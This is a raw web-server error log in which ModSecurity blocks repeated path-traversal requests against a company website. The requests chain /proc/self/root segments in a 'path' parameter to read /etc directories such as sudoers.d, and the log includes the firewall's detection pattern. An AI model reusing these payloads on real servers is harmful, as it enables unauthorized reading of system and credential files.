[Tue Mar 17 21:20:48.893635 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:41914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv4NY0UrI5A3LftIwowwAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:50.623409 2026] [:error] [pid 2598:tid 140411599251200] [client 74.7.241.31:41916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv4hj0p0SRWAqcjGGizQAAAxE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:52.006798 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:41930] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv5Ih-PF_25v4hFRCUegAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:54.757567 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:41940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv5uyqAr6etmhZHNpQXAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:56.822983 2026] [:error] [pid 25836:tid 140411557287680] [client 74.7.241.31:41944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv6Ih-PF_25v4hFRCUgAAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:06.189816 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:21:08.303552 2026] [:error] [pid 11088:tid 140411666392832] [client 74.7.241.31:40296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv9GmqtCojLHvu5cKSagAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:09.783030 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:40300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv9Rj0p0SRWAqcjGGi3wAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:11.339187 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.241.31:40312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv99Y0UrI5A3LftIwo1QAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:11.747087 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:40312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv99Y0UrI5A3LftIwo1gAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:13.117256 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:40320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv-XIk7brgkOH-rIW2KgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:14.600942 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:40332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv-hj0p0SRWAqcjGGi4QAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:17.103273 2026] [:error] [pid 11088:tid 140411548894976] [client 74.7.241.31:40336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv_WmqtCojLHvu5cKSbwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:29.142050 2026] [proxy_fcgi:error] [pid 11088:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53430] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:21:30.464104 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.241.31:32858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwCnIk7brgkOH-rIW2MAAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:32.588812 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:51046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwDNa6ubjKNq_cu4YwTAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:21:33.312090 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:32858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwDXIk7brgkOH-rIW2MgAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:34.469078 2026] [mime_magic:error] [pid 29151:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:48620] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/rpm/platform
[Tue Mar 17 21:21:35.111155 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:32866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwD9a6ubjKNq_cu4YwUgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:37.487384 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:43616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwEew_le52K8_3pV12DwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:39.367956 2026] [:error] [pid 11088:tid 140411733534464] [client 74.7.241.31:43622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwEmmqtCojLHvu5cKSeQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:40.934561 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:43638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwFNY0UrI5A3LftIwo7wAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:42.660048 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:43652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwFtY0UrI5A3LftIwo8wAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:44.581897 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:43656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwGIh-PF_25v4hFRCUoAAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:21:46.115260 2026] [:error] [pid 11088:tid 140411641214720] [client 74.7.241.31:43664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnwGmmqtCojLHvu5cKSfQAAAIw"], referer: 